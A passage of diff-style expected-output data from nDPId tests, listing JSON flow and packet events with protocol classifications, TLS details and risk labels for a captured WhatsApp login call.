+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1200,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1432582331698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582331698,"pkt":"APS5Jrv0xiwDYGpkCABFAAAo+xwAAO0GcDgRp44nwKgCBAG7wC16MJhgZIB38FARn\/78bwAA"} 
+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1203,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1432582331825,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582331825,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAo40dAAEAG9Q3AqAIEEaeOJ8AtAbtkgHfwejCYYVAQ\/\/6cbwAA"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1217,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582355253,"flow_last_seen":1432582355253,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582355253,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1217,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1432582355253,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582355253,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAz7ZAAEAGVELAqAIEEa1CZsA1Abt+ckUjAAAAALAC\/\/9LOwAAAgQFtAEDAwQBAQgKLfwhgQAAAAAEAgAA"} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1432582355393,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582355393,"pkt":"APS5Jrv0xiwDYGpkCABFAAA009MAAO8G4TARrUJmwKgCBAG7wDWkxiaffnJFJIASH\/7nbQAAAgQFoAEDAwQBAQQC"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1219,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1432582355478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582355478,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoTu9AAEAG1SHAqAIEEa1CZsA1Abt+ckUkpMYmoFAQQAAIJwAA"} +00992{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1220,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432582355253,"flow_last_seen":1432582355482,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1432582355482,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01033{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1222,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1432582355253,"flow_last_seen":1432582355622,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1432582355622,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224235,"flow_last_seen":1432582224264,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"5.178.42.26","src_port":49174,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224235,"flow_last_seen":1432582224264,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"5.178.42.26","src_port":49174,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224210,"flow_last_seen":1432582224240,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.82","src_port":49173,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224210,"flow_last_seen":1432582224240,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.82","src_port":49173,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582233314,"flow_last_seen":1432582233518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.8","src_port":49192,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582233314,"flow_last_seen":1432582233518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.8","src_port":49192,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582223077,"flow_last_seen":1432582223379,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.154.66.111","src_port":49163,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
+00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582223077,"flow_last_seen":1432582223379,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.154.66.111","src_port":49163,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582223075,"flow_last_seen":1432582223379,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.154.66.121","src_port":49166,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582223075,"flow_last_seen":1432582223379,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.154.66.121","src_port":49166,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225329,"flow_last_seen":1432582225381,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.130.137.77","src_port":49176,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225329,"flow_last_seen":1432582225381,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.130.137.77","src_port":49176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582224230,"flow_last_seen":1432582224260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":17,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"23.50.148.228","src_port":49172,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582224230,"flow_last_seen":1432582224260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":17,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"23.50.148.228","src_port":49172,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582227884,"flow_last_seen":1432582228167,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.14","src_port":49203,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582227884,"flow_last_seen":1432582228167,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.14","src_port":49203,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225324,"flow_last_seen":1432582225533,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.55","src_port":49165,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225324,"flow_last_seen":1432582225533,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.55","src_port":49165,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225313,"flow_last_seen":1432582225533,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.53","src_port":49175,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
+00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582225313,"flow_last_seen":1432582225533,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.53","src_port":49175,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582234869,"flow_last_seen":1432582235028,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.52","src_port":49182,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582234869,"flow_last_seen":1432582235028,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.52","src_port":49182,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582233751,"flow_last_seen":1432582233926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.49","src_port":49191,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582233751,"flow_last_seen":1432582233926,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.49","src_port":49191,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224208,"flow_last_seen":1432582224417,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49169,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
+00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1249,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582224208,"flow_last_seen":1432582224417,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582356195,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49169,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432582271840,"flow_last_seen":1432582331780,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":3000,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1432582222253,"flow_last_seen":1432582223191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":876,"flow_avg_l4_payload_len":51,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.70","src_port":49199,"dst_port":993,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"IMAPS.Apple","breed":"Safe","category":"Web"}} 
-00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1432582222253,"flow_last_seen":1432582223191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":876,"flow_avg_l4_payload_len":51,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.70","src_port":49199,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582249235,"flow_last_seen":1432582249292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.62.150.157","src_port":49194,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582249235,"flow_last_seen":1432582249292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.62.150.157","src_port":49194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1432582222253,"flow_last_seen":1432582223191,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":876,"flow_avg_l4_payload_len":51,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.70","src_port":49199,"dst_port":993,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"IMAPS.Apple","breed":"Safe","category":"Web"}} +00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1432582222253,"flow_last_seen":1432582223191,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":876,"flow_avg_l4_payload_len":51,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.70","src_port":49199,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582249235,"flow_last_seen":1432582249292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.62.150.157","src_port":49194,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582249235,"flow_last_seen":1432582249292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.62.150.157","src_port":49194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582296338,"flow_last_seen":1432582310666,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"173.252.114.1","src_port":52794,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 